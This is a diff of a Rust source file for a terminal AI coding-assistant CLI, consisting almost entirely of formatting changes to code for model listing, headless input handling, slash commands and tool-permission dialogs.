-async fn connect_mcp_manager_arc( - config: &Config, -) -> Option> { +async fn connect_mcp_manager_arc(config: &Config) -> Option> { if config.mcp_servers.is_empty() { return None; } - info!(count = config.mcp_servers.len(), "Connecting to MCP servers"); + info!( + count = config.mcp_servers.len(), + "Connecting to MCP servers" + ); let mcp_manager = Arc::new(claurst_mcp::McpManager::connect_all(&config.mcp_servers).await); mcp_manager.clone().spawn_notification_poll_loop(); Some(mcp_manager) @@ -909,14 +936,14 @@ fn models_dev_cache_path() -> PathBuf { /// Implementation of the `coven-code models` subcommand. /// /// Flags: -/// * `--refresh` — force-fetch from models.dev (ignoring the 5-minute -/// freshness window), then list. -/// * `--verbose` — also print release date, status, modalities, -/// cache pricing, and capability flags. -/// * `--json` — emit the registry as a JSON object keyed by -/// `provider/model` (suitable for piping into `jq`). -/// * `` — first non-flag arg filters by provider id -/// (e.g. `coven-code models openai`). +/// * `--refresh` — force-fetch from models.dev (ignoring the 5-minute +/// freshness window), then list. +/// * `--verbose` — also print release date, status, modalities, +/// cache pricing, and capability flags. +/// * `--json` — emit the registry as a JSON object keyed by +/// `provider/model` (suitable for piping into `jq`). +/// * `` — first non-flag arg filters by provider id +/// (e.g. `coven-code models openai`). async fn run_models_command(args: &[String]) -> anyhow::Result<()> { let mut refresh = false; let mut verbose = false; @@ -943,8 +970,7 @@ async fn run_models_command(args: &[String]) -> anyhow::Result<()> { } } - let mut registry = claurst_api::ModelRegistry::new() - .with_cache_path(models_cache_path()); + let mut registry = claurst_api::ModelRegistry::new().with_cache_path(models_cache_path()); if refresh { // Force-refresh by clearing the freshness check first. @@ -968,14 +994,15 @@ async fn run_models_command(args: &[String]) -> anyhow::Result<()> { // Stable order: provider id, then by descending release_date so newest // models appear first. entries.sort_by(|a, b| { - (&*a.info.provider_id) - .cmp(&*b.info.provider_id) + a.info + .provider_id + .cmp(&b.info.provider_id) .then_with(|| { let rd_a = a.release_date.as_deref().unwrap_or(""); let rd_b = b.release_date.as_deref().unwrap_or(""); rd_b.cmp(rd_a) }) - .then_with(|| (&*a.info.id).cmp(&*b.info.id)) + .then_with(|| a.info.id.cmp(&b.info.id)) }); if as_json { @@ -1009,12 +1036,26 @@ async fn run_models_command(args: &[String]) -> anyhow::Result<()> { let out_cost = entry.cost_output.unwrap_or(0.0); let mut flags = Vec::new(); - if entry.tool_calling { flags.push("tools"); } - if entry.reasoning { flags.push("reasoning"); } - if entry.vision() { flags.push("vision"); } - if entry.audio_input() { flags.push("audio"); } - if entry.pdf_input() { flags.push("pdf"); } - let flags_str = if flags.is_empty() { String::new() } else { format!(" [{}]", flags.join(",")) }; + if entry.tool_calling { + flags.push("tools"); + } + if entry.reasoning { + flags.push("reasoning"); + } + if entry.vision() { + flags.push("vision"); + } + if entry.audio_input() { + flags.push("audio"); + } + if entry.pdf_input() { + flags.push("pdf"); + } + let flags_str = if flags.is_empty() { + String::new() + } else { + format!(" [{}]", flags.join(",")) + }; if verbose { println!( @@ -1150,7 +1191,10 @@ fn spawn_models_cache_refresh() { let url = models_source_url(); let resp = match client .get(&url) - .header("User-Agent", concat!("CovenCode/", env!("CARGO_PKG_VERSION"))) + .header( + "User-Agent", + concat!("CovenCode/", env!("CARGO_PKG_VERSION")), + ) .send() .await { @@ -1241,8 +1285,10 @@ async fn refresh_provider_runtime_state( claurst_api::AnthropicClient::new(client_config.clone()) .context("Failed to rebuild Anthropic client")?, ); - let provider_registry = - Arc::new(claurst_api::ProviderRegistry::from_config(&config, client_config)); + let provider_registry = Arc::new(claurst_api::ProviderRegistry::from_config( + &config, + client_config, + )); let model_registry = load_cached_model_registry(); spawn_models_cache_refresh(); @@ -1303,8 +1349,7 @@ fn filter_read_only_tools( let allowed_names: Vec = tools .iter() .filter(|t| { - matches!(t.permission_level(), PL::ReadOnly | PL::None) - || t.name() == "AskUserQuestion" + matches!(t.permission_level(), PL::ReadOnly | PL::None) || t.name() == "AskUserQuestion" }) .map(|t| t.name().to_string()) .collect(); @@ -1344,72 +1389,78 @@ async fn run_headless( // --input-format stream-json: stdin is newline-delimited JSON, each line is // {"role":"user"|"assistant","content":"..."} (mirrors TS --input-format stream-json). // --input-format text (default): read prompt from positional arg or entire stdin as text. - let mut messages: Vec = if cli.input_format == CliInputFormat::StreamJson { - use tokio::io::{self, AsyncBufReadExt, BufReader}; - let stdin = io::stdin(); - let mut reader = BufReader::new(stdin); - let mut line = String::new(); - let mut parsed: Vec = Vec::new(); - loop { - line.clear(); - let n = reader.read_line(&mut line).await?; - if n == 0 { - break; - } - let trimmed = line.trim(); - if trimmed.is_empty() { - continue; - } - match serde_json::from_str::(trimmed) { - Ok(v) => { - let role = v.get("role").and_then(|r| r.as_str()).unwrap_or("user"); - let content = v - .get("content") - .and_then(|c| c.as_str()) - .unwrap_or("") - .to_string(); - if role == "assistant" { - parsed.push(claurst_core::types::Message::assistant(content)); - } else { - parsed.push(claurst_core::types::Message::user(content)); - } + let mut messages: Vec = + if cli.input_format == CliInputFormat::StreamJson { + use tokio::io::{self, AsyncBufReadExt, BufReader}; + let stdin = io::stdin(); + let mut reader = BufReader::new(stdin); + let mut line = String::new(); + let mut parsed: Vec = Vec::new(); + loop { + line.clear(); + let n = reader.read_line(&mut line).await?; + if n == 0 { + break; } - Err(e) => { - eprintln!("Warning: skipping malformed JSON line: {} ({:?})", trimmed, e); + let trimmed = line.trim(); + if trimmed.is_empty() { + continue; + } + match serde_json::from_str::(trimmed) { + Ok(v) => { + let role = v.get("role").and_then(|r| r.as_str()).unwrap_or("user"); + let content = v + .get("content") + .and_then(|c| c.as_str()) + .unwrap_or("") + .to_string(); + if role == "assistant" { + parsed.push(claurst_core::types::Message::assistant(content)); + } else { + parsed.push(claurst_core::types::Message::user(content)); + } + } + Err(e) => { + eprintln!( + "Warning: skipping malformed JSON line: {} ({:?})", + trimmed, e + ); + } } } - } - if parsed.is_empty() { - // Also check positional arg as fallback - if let Some(ref p) = cli.prompt { - parsed.push(claurst_core::types::Message::user(p.clone())); + if parsed.is_empty() { + // Also check positional arg as fallback + if let Some(ref p) = cli.prompt { + parsed.push(claurst_core::types::Message::user(p.clone())); + } } - } - parsed - } else { - // Plain text mode - let prompt = if let Some(ref p) = cli.prompt { - p.clone() + parsed } else { - use tokio::io::{self, AsyncReadExt}; - let mut stdin = io::stdin(); - let mut buf = String::new(); - stdin.read_to_string(&mut buf).await?; - buf.trim().to_string() - }; + // Plain text mode + let prompt = if let Some(ref p) = cli.prompt { + p.clone() + } else { + use tokio::io::{self, AsyncReadExt}; + let mut stdin = io::stdin(); + let mut buf = String::new(); + stdin.read_to_string(&mut buf).await?; + buf.trim().to_string() + }; - if prompt.is_empty() { - eprintln!("Error: No prompt provided. Use --print or pipe text to stdin."); - std::process::exit(1); - } + if prompt.is_empty() { + eprintln!("Error: No prompt provided. Use --print or pipe text to stdin."); + std::process::exit(1); + } - vec![claurst_core::types::Message::user(prompt)] - }; + vec![claurst_core::types::Message::user(prompt)] + }; // --prefill: inject a partial assistant turn before the query so the model // continues from that text (mirrors TS --prefill flag). if let Some(ref prefill_text) = cli.prefill { - messages.push(claurst_core::types::Message::assistant(prefill_text.clone())); + messages.push(claurst_core::types::Message::assistant( + prefill_text.clone(), + )); } if messages.is_empty() { @@ -1417,7 +1468,10 @@ async fn run_headless( std::process::exit(1); } - let is_json_output = matches!(cli.output_format, CliOutputFormat::Json | CliOutputFormat::StreamJson); + let is_json_output = matches!( + cli.output_format, + CliOutputFormat::Json | CliOutputFormat::StreamJson + ); let is_stream_json = matches!(cli.output_format, CliOutputFormat::StreamJson); let (event_tx, mut event_rx) = mpsc::unbounded_channel::(); @@ -1493,35 +1547,33 @@ async fn run_headless( // Final output match cli.output_format { - CliOutputFormat::Json => { - match outcome { - QueryOutcome::EndTurn { message, usage } => { - let result_text = if full_text.is_empty() { - message.get_all_text() - } else { - full_text - }; - let out = serde_json::json!({ - "type": "result", - "result": result_text, - "usage": { - "input_tokens": usage.input_tokens, - "output_tokens": usage.output_tokens, - "cache_creation_input_tokens": usage.cache_creation_input_tokens, - "cache_read_input_tokens": usage.cache_read_input_tokens, - }, - "cost_usd": cost_tracker.total_cost_usd(), - }); - println!("{}", out); - } - QueryOutcome::Error(e) => { - let out = serde_json::json!({ "type": "error", "error": e.to_string() }); - eprintln!("{}", out); - std::process::exit(1); - } - _ => {} + CliOutputFormat::Json => match outcome { + QueryOutcome::EndTurn { message, usage } => { + let result_text = if full_text.is_empty() { + message.get_all_text() + } else { + full_text + }; + let out = serde_json::json!({ + "type": "result", + "result": result_text, + "usage": { + "input_tokens": usage.input_tokens, + "output_tokens": usage.output_tokens, + "cache_creation_input_tokens": usage.cache_creation_input_tokens, + "cache_read_input_tokens": usage.cache_read_input_tokens, + }, + "cost_usd": cost_tracker.total_cost_usd(), + }); + println!("{}", out); } - } + QueryOutcome::Error(e) => { + let out = serde_json::json!({ "type": "error", "error": e.to_string() }); + eprintln!("{}", out); + std::process::exit(1); + } + _ => {} + }, CliOutputFormat::StreamJson => { // Already streamed above; emit final result event match outcome { @@ -1560,7 +1612,10 @@ async fn run_headless( eprintln!("Error: {}", e); std::process::exit(1); } - QueryOutcome::BudgetExceeded { cost_usd, limit_usd } => { + QueryOutcome::BudgetExceeded { + cost_usd, + limit_usd, + } => { eprintln!( "Budget limit ${:.4} reached (spent ${:.4}). Stopping.", limit_usd, cost_usd @@ -1600,21 +1655,23 @@ fn permission_request_from_core( command, suggested_prefix, ) - }, + } ("PowerShell", Some(command)) => claurst_tui::dialogs::PermissionRequest::powershell( tool_use_id, tool_name, reason, command, ), - ("Read", Some(path)) => claurst_tui::dialogs::PermissionRequest::file_read( - tool_use_id, - tool_name, - reason, - path, - ), + ("Read", Some(path)) => { + claurst_tui::dialogs::PermissionRequest::file_read(tool_use_id, tool_name, reason, path) + } (_, Some(path)) if matches!(tool_name.as_str(), "Write" | "Edit" | "NotebookEdit") => { - claurst_tui::dialogs::PermissionRequest::file_write(tool_use_id, tool_name, reason, path) + claurst_tui::dialogs::PermissionRequest::file_write( + tool_use_id, + tool_name, + reason, + path, + ) } _ => claurst_tui::dialogs::PermissionRequest::from_reason( tool_use_id, @@ -1625,7 +1682,10 @@ fn permission_request_from_core( } } - +#[expect( + clippy::too_many_arguments, + reason = "interactive runtime entrypoint wires independent CLI, TUI, bridge, and tool handles" +)] async fn run_interactive( config: Config, settings: claurst_core::config::Settings, @@ -1638,15 +1698,16 @@ async fn run_interactive( bridge_config: Option, has_credentials: bool, model_registry: Arc, - user_question_rx: Option>, + user_question_rx: Option< + tokio::sync::mpsc::UnboundedReceiver, + >, ) -> anyhow::Result<()> { - use claurst_commands::{execute_command, CommandContext, CommandResult}; use claurst_bridge::{BridgeOutbound, TuiBridgeEvent}; + use claurst_commands::{execute_command, CommandContext, CommandResult}; use claurst_query::{QueryEvent, QueryOutcome}; use claurst_tui::{ - bridge_state::BridgeConnectionState, notifications::NotificationKind, - render::render_app, restore_terminal, setup_terminal, App, - device_auth_dialog::DeviceAuthEvent, + bridge_state::BridgeConnectionState, device_auth_dialog::DeviceAuthEvent, + notifications::NotificationKind, render::render_app, restore_terminal, setup_terminal, App, }; use crossterm::event::{self, Event, KeyCode}; use std::time::Duration; @@ -1687,21 +1748,22 @@ async fn run_interactive( session } Err(e) => { - resume_warning = Some(format!("Could not load session {}: {}. Starting new session.", id, e)); - let mut session = - claurst_core::history::ConversationSession::new( - claurst_api::effective_model_for_config(&config, &model_registry), - ); + resume_warning = Some(format!( + "Could not load session {}: {}. Starting new session.", + id, e + )); + let mut session = claurst_core::history::ConversationSession::new( + claurst_api::effective_model_for_config(&config, &model_registry), + ); session.id = tool_ctx.session_id.clone(); session.working_dir = Some(tool_ctx.working_dir.display().to_string()); session } } } else { - let mut session = - claurst_core::history::ConversationSession::new( - claurst_api::effective_model_for_config(&config, &model_registry), - ); + let mut session = claurst_core::history::ConversationSession::new( + claurst_api::effective_model_for_config(&config, &model_registry), + ); session.id = tool_ctx.session_id.clone(); session.working_dir = Some(tool_ctx.working_dir.display().to_string()); session @@ -1712,11 +1774,11 @@ async fn run_interactive( if !session.model.is_empty() { live_config.model = Some(session.model.clone()); } - let pending_permissions = tool_ctx - .pending_permissions - .clone() - .unwrap_or_else(|| Arc::new(ParkingMutex::new(claurst_tools::PendingPermissionStore::default()))); - + let pending_permissions = tool_ctx.pending_permissions.clone().unwrap_or_else(|| { + Arc::new(ParkingMutex::new( + claurst_tools::PendingPermissionStore::default(), + )) + }); // Set up terminal let mut terminal = setup_terminal()?; @@ -1728,10 +1790,10 @@ async fn run_interactive( if let Some(level) = base_query_config.effort_level { use claurst_tui::EffortLevel as TuiEL; app.effort_level = match level { - claurst_core::effort::EffortLevel::Low => TuiEL::Low, + claurst_core::effort::EffortLevel::Low => TuiEL::Low, claurst_core::effort::EffortLevel::Medium => TuiEL::Normal, - claurst_core::effort::EffortLevel::High => TuiEL::High, - claurst_core::effort::EffortLevel::Max => TuiEL::Max, + claurst_core::effort::EffortLevel::High => TuiEL::High, + claurst_core::effort::EffortLevel::Max => TuiEL::Max, }; } app.provider_registry = base_query_config.provider_registry.clone(); @@ -1789,7 +1851,9 @@ async fn run_interactive( // Only show once per session — subsequent sessions in the same directory // will show the dialog again (not persisted across sessions). use claurst_core::config::PermissionMode; - if live_config.permission_mode == PermissionMode::BypassPermissions && !app.bypass_permissions_dialog_shown { + if live_config.permission_mode == PermissionMode::BypassPermissions + && !app.bypass_permissions_dialog_shown + { app.bypass_permissions_dialog.show(); app.bypass_permissions_dialog_shown = true; } else if live_config.permission_mode != PermissionMode::BypassPermissions { @@ -1799,7 +1863,8 @@ async fn run_interactive( if !settings.has_completed_onboarding { app.onboarding_dialog.show(); } else { - app.status_message = Some("No provider configured. Run /connect to set one up.".to_string()); + app.status_message = + Some("No provider configured. Run /connect to set one up.".to_string()); } } else if !settings.has_completed_onboarding { // User has credentials but hasn't formally completed onboarding — mark it done @@ -1868,9 +1933,7 @@ async fn run_interactive( // Preserve the bridge token before consuming bridge_config so we can reconstruct // a BridgeSessionInfo once the bridge worker reports it has connected. - let bridge_token: Option = bridge_config - .as_ref() - .and_then(|c| c.session_token.clone()); + let bridge_token: Option = bridge_config.as_ref().and_then(|c| c.session_token.clone()); let mut bridge_runtime: Option = if let Some(cfg) = bridge_config { let bridge_cancel = CancellationToken::new(); @@ -1882,7 +1945,9 @@ async fn run_interactive( let cancel_clone = bridge_cancel.clone(); tokio::spawn(async move { - if let Err(e) = claurst_bridge::run_bridge_loop(cfg, tui_tx, outbound_rx, cancel_clone).await { + if let Err(e) = + claurst_bridge::run_bridge_loop(cfg, tui_tx, outbound_rx, cancel_clone).await + { warn!("Bridge loop exited with error: {}", e); } }); @@ -1990,7 +2055,9 @@ async fn run_interactive( app.notifications.tick(); // Process file injection dialog outcome (if any) - if let Some((outcome, pending_input, pending_imgs)) = app.file_injection_dialog.take_outcome() { + if let Some((outcome, pending_input, pending_imgs)) = + app.file_injection_dialog.take_outcome() + { use claurst_tui::FileInjectionOutcome; if matches!(outcome, FileInjectionOutcome::Abort) { @@ -2072,8 +2139,13 @@ async fn run_interactive( // If a file-ref suggestion is active, accept it instead of submitting. if !app.prompt_input.suggestions.is_empty() && app.prompt_input.suggestion_index.is_some() - && app.prompt_input.suggestions.get(app.prompt_input.suggestion_index.unwrap()) - .map(|s| s.source == claurst_tui::prompt_input::TypeaheadSource::FileRef) + && app + .prompt_input + .suggestions + .get(app.prompt_input.suggestion_index.unwrap()) + .map(|s| { + s.source == claurst_tui::prompt_input::TypeaheadSource::FileRef + }) .unwrap_or(false) { app.prompt_input.accept_suggestion(); @@ -2116,8 +2188,15 @@ async fn run_interactive( let skip_tui_for_args = !cmd_args.is_empty() && matches!( cmd_name.as_str(), - "model" | "theme" | "resume" | "session" - | "vim" | "vi" | "voice" | "fast" | "speed" + "model" + | "theme" + | "resume" + | "session" + | "vim" + | "vi" + | "voice" + | "fast" + | "speed" ); let handled_by_tui = if skip_tui_for_args { false @@ -2129,14 +2208,18 @@ async fn run_interactive( // (no-args /effort → cycle Low→Med→High→Max→Low). if handled_by_tui && cmd_name == "effort" && cmd_args.is_empty() { current_effort = Some(match app.effort_level { - claurst_tui::EffortLevel::Low => - claurst_core::effort::EffortLevel::Low, - claurst_tui::EffortLevel::Normal => - claurst_core::effort::EffortLevel::Medium, - claurst_tui::EffortLevel::High => - claurst_core::effort::EffortLevel::High, - claurst_tui::EffortLevel::Max => - claurst_core::effort::EffortLevel::Max, + claurst_tui::EffortLevel::Low => { + claurst_core::effort::EffortLevel::Low + } + claurst_tui::EffortLevel::Normal => { + claurst_core::effort::EffortLevel::Medium + } + claurst_tui::EffortLevel::High => { + claurst_core::effort::EffortLevel::High + } + claurst_tui::EffortLevel::Max => { + claurst_core::effort::EffortLevel::Max + } }); } @@ -2164,12 +2247,10 @@ async fn run_interactive( app.replace_messages(Vec::new()); session.messages.clear(); session.updated_at = chrono::Utc::now(); - app.status_message = - Some("Conversation cleared.".to_string()); + app.status_message = Some("Conversation cleared.".to_string()); } Some(CommandResult::SetMessages(new_msgs)) => { - let removed = - messages.len().saturating_sub(new_msgs.len()); + let removed = messages.len().saturating_sub(new_msgs.len()); messages = new_msgs.clone(); app.replace_messages(new_msgs); session.messages = messages.clone(); @@ -2213,44 +2294,34 @@ async fn run_interactive( tool_ctx.file_history = Arc::new(ParkingMutex::new( claurst_core::file_history::FileHistory::new(), )); - tool_ctx.current_turn = Arc::new( - std::sync::atomic::AtomicUsize::new(0), - ); + tool_ctx.current_turn = + Arc::new(std::sync::atomic::AtomicUsize::new(0)); cmd_ctx.session_id = session.id.clone(); cmd_ctx.session_title = session.title.clone(); if let Some(saved_dir) = session.working_dir.as_ref() { - let saved_path = - std::path::PathBuf::from(saved_dir); + let saved_path = std::path::PathBuf::from(saved_dir); if saved_path.exists() { tool_ctx.working_dir = saved_path.clone(); cmd_ctx.working_dir = saved_path; } } - app.config.project_dir = - Some(tool_ctx.working_dir.clone()); + app.config.project_dir = Some(tool_ctx.working_dir.clone()); app.attach_turn_diff_state( tool_ctx.file_history.clone(), tool_ctx.current_turn.clone(), ); - claurst_tui::update_terminal_title( - session.title.as_deref(), - ); - app.status_message = Some(format!( - "Resumed session {}.", - &session.id[..8] - )); + claurst_tui::update_terminal_title(session.title.as_deref()); + app.status_message = + Some(format!("Resumed session {}.", &session.id[..8])); } Some(CommandResult::RenameSession(title)) => { session.title = Some(title.clone()); session.updated_at = chrono::Utc::now(); cmd_ctx.session_title = session.title.clone(); - let _ = - claurst_core::history::save_session(&session).await; + let _ = claurst_core::history::save_session(&session).await; claurst_tui::update_terminal_title(Some(&title)); - app.status_message = Some(format!( - "Session renamed to \"{}\".", - title - )); + app.status_message = + Some(format!("Session renamed to \"{}\".", title)); } Some(CommandResult::RefreshProviderState) => { if app.is_streaming || current_query.is_some() { @@ -2259,7 +2330,8 @@ async fn run_interactive( .to_string(), ); } else { - match refresh_provider_runtime_state(&cmd_ctx.config).await { + match refresh_provider_runtime_state(&cmd_ctx.config).await + { Ok(refreshed) => { cmd_ctx.config = refreshed.config.clone(); tool_ctx.config = refreshed.config.clone(); @@ -2290,10 +2362,8 @@ async fn run_interactive( ); } Err(err) => { - app.status_message = Some(format!( - "Error: {}", - err - )); + app.status_message = + Some(format!("Error: {}", err)); } } } @@ -2318,9 +2388,9 @@ async fn run_interactive( // overlay for this command (e.g. /stats opens dialog // AND would push a text message — drop the text). if !handled_by_tui { - app.push_message( - claurst_core::types::Message::assistant(msg), - ); + app.push_message(claurst_core::types::Message::assistant( + msg, + )); } } Some(CommandResult::ConfigChange(new_cfg)) => { @@ -2334,7 +2404,8 @@ async fn run_interactive( app.set_model(model.clone()); } // Sync fast_mode visual indicator. - app.fast_mode = applied_cfg.model + app.fast_mode = applied_cfg + .model .as_deref() .map(|m| m.contains("haiku")) .unwrap_or(false); @@ -2347,8 +2418,7 @@ async fn run_interactive( &cmd_ctx.config, &model_registry, ); - app.status_message = - Some("Configuration updated.".to_string()); + app.status_message = Some("Configuration updated.".to_string()); } Some(CommandResult::ConfigChangeMessage(new_cfg, msg)) => { let mut applied_cfg = new_cfg; @@ -2376,11 +2446,7 @@ async fn run_interactive( } Some(CommandResult::StartOAuthFlow(with_claude_ai)) => { claurst_tui::restore_terminal(&mut terminal).ok(); - match oauth_flow::run_oauth_login_flow( - with_claude_ai, - ) - .await - { + match oauth_flow::run_oauth_login_flow(with_claude_ai).await { Ok(_) => { app.status_message = Some("Login successful!".to_string()); @@ -2403,9 +2469,10 @@ async fn run_interactive( }) => { claurst_tui::restore_terminal(&mut terminal).ok(); if provider == claurst_core::accounts::PROVIDER_CODEX { - let (tx, mut rx) = tokio::sync::mpsc::channel::< - claurst_tui::DeviceAuthEvent, - >(8); + let (tx, mut rx) = + tokio::sync::mpsc::channel::< + claurst_tui::DeviceAuthEvent, + >(8); tokio::spawn(async move { while let Some(evt) = rx.recv().await { if let claurst_tui::DeviceAuthEvent::GotBrowserUrl { @@ -2428,9 +2495,8 @@ async fn run_interactive( .await { Ok(_) => { - app.status_message = Some( - "Codex login successful!".to_string(), - ); + app.status_message = + Some("Codex login successful!".to_string()); eprintln!("\nCodex login successful!"); break 'main; } @@ -2471,23 +2537,24 @@ async fn run_interactive( // Sync effort visual + API level when CLI handled // /effort with explicit args (/effort high). - if handled_by_cli - && cmd_name == "effort" - && !cmd_args.is_empty() - { + if handled_by_cli && cmd_name == "effort" && !cmd_args.is_empty() { if let Some(level) = - claurst_core::effort::EffortLevel::from_str(&cmd_args) + claurst_core::effort::EffortLevel::parse(&cmd_args) { current_effort = Some(level); app.effort_level = match level { - claurst_core::effort::EffortLevel::Low => - claurst_tui::EffortLevel::Low, - claurst_core::effort::EffortLevel::Medium => - claurst_tui::EffortLevel::Normal, - claurst_core::effort::EffortLevel::High => - claurst_tui::EffortLevel::High, - claurst_core::effort::EffortLevel::Max => - claurst_tui::EffortLevel::Max, + claurst_core::effort::EffortLevel::Low => { + claurst_tui::EffortLevel::Low + } + claurst_core::effort::EffortLevel::Medium => { + claurst_tui::EffortLevel::Normal + } + claurst_core::effort::EffortLevel::High => { + claurst_tui::EffortLevel::High + } + claurst_core::effort::EffortLevel::Max => { + claurst_tui::EffortLevel::Max + } }; app.status_message = Some(format!( "Effort: {} {}", @@ -2507,10 +2574,8 @@ async fn run_interactive( } if !handled_by_cli && !handled_by_tui { - app.status_message = Some(format!( - "Unknown command: /{}", - cmd_name - )); + app.status_message = + Some(format!("Unknown command: /{}", cmd_name)); } // If a UserMessage was queued (e.g. /compact), submit it. @@ -2560,22 +2625,42 @@ async fn run_interactive( } else { app.config.file_injection_max_size }; - let (within_limit, mut oversized) = parse_at_refs(&input, &tool_ctx.working_dir, effective_limit); + let (within_limit, mut oversized) = + parse_at_refs(&input, &tool_ctx.working_dir, effective_limit); if was_force { - oversized.retain(|f| !matches!(f.issue, Some(claurst_tui::AtFileIssue::IsDirectory))); + oversized.retain(|f| { + !matches!(f.issue, Some(claurst_tui::AtFileIssue::IsDirectory)) + }); } if !oversized.is_empty() { // Show either the directory warning or the file warning, never both. // Directories take precedence: if any are present, show only those. - let has_dirs = oversized.iter().any(|f| matches!(f.issue, Some(claurst_tui::AtFileIssue::IsDirectory))); - let oversized_summaries: Vec<(String, usize, claurst_tui::AtFileIssue)> = oversized + let has_dirs = oversized.iter().any(|f| { + matches!(f.issue, Some(claurst_tui::AtFileIssue::IsDirectory)) + }); + let oversized_summaries: Vec<( + String, + usize, + claurst_tui::AtFileIssue, + )> = oversized .iter() .filter(|f| { - let is_dir = matches!(f.issue, Some(claurst_tui::AtFileIssue::IsDirectory)); - if has_dirs { is_dir } else { !is_dir } + let is_dir = matches!( + f.issue, + Some(claurst_tui::AtFileIssue::IsDirectory) + ); + if has_dirs { + is_dir + } else { + !is_dir + } + }) + .filter_map(|f| { + f.issue.clone().map(|issue| { + (f.path.display().to_string(), f.size_kb, issue) + }) }) - .filter_map(|f| f.issue.clone().map(|issue| (f.path.display().to_string(), f.size_kb, issue))) .collect(); app.file_injection_dialog.show( @@ -2590,19 +2675,24 @@ async fn run_interactive( } // No oversized files: inject within-limit files and send - let file_prefix = claurst_tui::file_injection::build_file_blocks(&within_limit); + let file_prefix = + claurst_tui::file_injection::build_file_blocks(&within_limit); let user_msg = if !file_prefix.is_empty() || !pending_imgs.is_empty() { let mut blocks: Vec = Vec::new(); // Add file blocks if there's any file content if !file_prefix.is_empty() { - blocks.push(claurst_core::types::ContentBlock::Text { text: file_prefix }); + blocks.push(claurst_core::types::ContentBlock::Text { + text: file_prefix, + }); } // Add image blocks for img in &pending_imgs { - if let Some(b64) = claurst_tui::image_paste::encode_image_base64(&img.path) { + if let Some(b64) = + claurst_tui::image_paste::encode_image_base64(&img.path) + { blocks.push(claurst_core::types::ContentBlock::Image { source: claurst_core::types::ImageSource { source_type: "base64".to_string(), @@ -2615,7 +2705,9 @@ async fn run_interactive( } // Add the original input text - blocks.push(claurst_core::types::ContentBlock::Text { text: input.clone() }); + blocks.push(claurst_core::types::ContentBlock::Text { + text: input.clone(), + }); claurst_core::types::Message::user_blocks(blocks) } else { @@ -2631,21 +2723,28 @@ async fn run_interactive( let user_msg = if pending_imgs.is_empty() { claurst_core::types::Message::user(input.clone()) } else { - let mut blocks: Vec = pending_imgs - .iter() - .filter_map(|img| { - claurst_tui::image_paste::encode_image_base64(&img.path) - .map(|b64| claurst_core::types::ContentBlock::Image { - source: claurst_core::types::ImageSource { - source_type: "base64".to_string(), - media_type: Some("image/png".to_string()), - data: Some(b64), - url: None, - }, - }) - }) - .collect(); - blocks.push(claurst_core::types::ContentBlock::Text { text: input.clone() }); + let mut blocks: Vec = + pending_imgs + .iter() + .filter_map(|img| { + claurst_tui::image_paste::encode_image_base64(&img.path) + .map(|b64| { + claurst_core::types::ContentBlock::Image { + source: claurst_core::types::ImageSource { + source_type: "base64".to_string(), + media_type: Some( + "image/png".to_string(), + ), + data: Some(b64), + url: None, + }, + } + }) + }) + .collect(); + blocks.push(claurst_core::types::ContentBlock::Text { + text: input.clone(), + }); claurst_core::types::Message::user_blocks(blocks) }; @@ -2679,7 +2778,10 @@ async fn run_interactive( let tools_arc_clone = tools_arc.clone(); let mut ctx_clone = tool_ctx.clone(); let mut qcfg = base_query_config.clone(); - qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); + qcfg.model = claurst_api::effective_model_for_config( + &cmd_ctx.config, + &model_registry, + ); qcfg.max_tokens = cmd_ctx.config.effective_max_tokens(); qcfg.append_system_prompt = cmd_ctx.config.append_system_prompt.clone(); qcfg.system_prompt = base_query_config.system_prompt.clone(); @@ -2707,17 +2809,21 @@ async fn run_interactive( if let Some(ref cq) = qcfg.command_queue { let cq = cq.clone(); let aux_tx = bg_completion_tx.clone(); - ctx_clone.completion_notifier = Some(claurst_tools::CompletionNotifier::new(move |info: claurst_tools::BgTaskCompletion| { - let msg = format!( + ctx_clone.completion_notifier = Some( + claurst_tools::CompletionNotifier::new( + move |info: claurst_tools::BgTaskCompletion| { + let msg = format!( "[Monitor] Background task {} completed ({}).\nCommand: {}\nOutput (last 2000 chars):\n{}", info.task_id, info.exit_info, info.command, info.output_tail ); - cq.push( - claurst_query::QueuedCommand::InjectSystemMessage(msg), - claurst_query::CommandPriority::Normal, - ); - let _ = aux_tx.send(info); - })); + cq.push( + claurst_query::QueuedCommand::InjectSystemMessage(msg), + claurst_query::CommandPriority::Normal, + ); + let _ = aux_tx.send(info); + }, + ), + ); } let tracker = cost_tracker.clone(); let tx = event_tx.clone(); @@ -2760,9 +2866,20 @@ async fn run_interactive( .and_then(|p| p.request.path.clone()); let bash_prefix = if should_record_bash_prefix { match &pr.kind { - claurst_tui::dialogs::PermissionDialogKind::Bash { command, .. } => { - let first_word = command.split_whitespace().next().unwrap_or("").to_string(); - if first_word.is_empty() { None } else { Some(first_word) } + claurst_tui::dialogs::PermissionDialogKind::Bash { + command, + .. + } => { + let first_word = command + .split_whitespace() + .next() + .unwrap_or("") + .to_string(); + if first_word.is_empty() { + None + } else { + Some(first_word) + } } _ => None, } @@ -2775,9 +2892,13 @@ async fn run_interactive( app.bash_prefix_allowlist.insert(prefix); } - if let Some(mut pending) = pending_permissions.lock().waiting.remove(&tool_use_id) { + if let Some(mut pending) = + pending_permissions.lock().waiting.remove(&tool_use_id) + { let decision = match selected_key { - Some('n') => claurst_core::permissions::PermissionDecision::Deny, + Some('n') => { + claurst_core::permissions::PermissionDecision::Deny + } _ => claurst_core::permissions::PermissionDecision::Allow, }; @@ -2786,21 +2907,32 @@ async fn run_interactive( match selected_key { Some('Y') => { if let Some(path) = selected_path.as_deref() { - manager.add_session_allow_path(&pending.request.tool_name, path); + manager.add_session_allow_path( + &pending.request.tool_name, + path, + ); } else { - manager.add_session_allow(&pending.request.tool_name); + manager.add_session_allow( + &pending.request.tool_name, + ); } } Some('p') => { - let mut settings = match claurst_core::config::Settings::load_sync() { - Ok(s) => s, - Err(_) => claurst_core::config::Settings::default(), - }; + let mut settings = + claurst_core::config::Settings::load_sync() + .unwrap_or_default(); if let Some(path) = selected_path.as_deref() { let pattern = format!("{}*", path); - let _ = manager.add_persistent_allow_path(&pending.request.tool_name, &pattern, &mut settings); + let _ = manager.add_persistent_allow_path( + &pending.request.tool_name, + &pattern, + &mut settings, + ); } else { - let _ = manager.add_persistent_allow(&pending.request.tool_name, &mut settings); + let _ = manager.add_persistent_allow( + &pending.request.tool_name, + &mut settings, + ); } } _ => {} @@ -2833,7 +2965,8 @@ async fn run_interactive( if app.agent_mode_changed { app.agent_mode_changed = false; let mode = app.agent_mode.as_deref().unwrap_or("build"); - let mut all_agents = 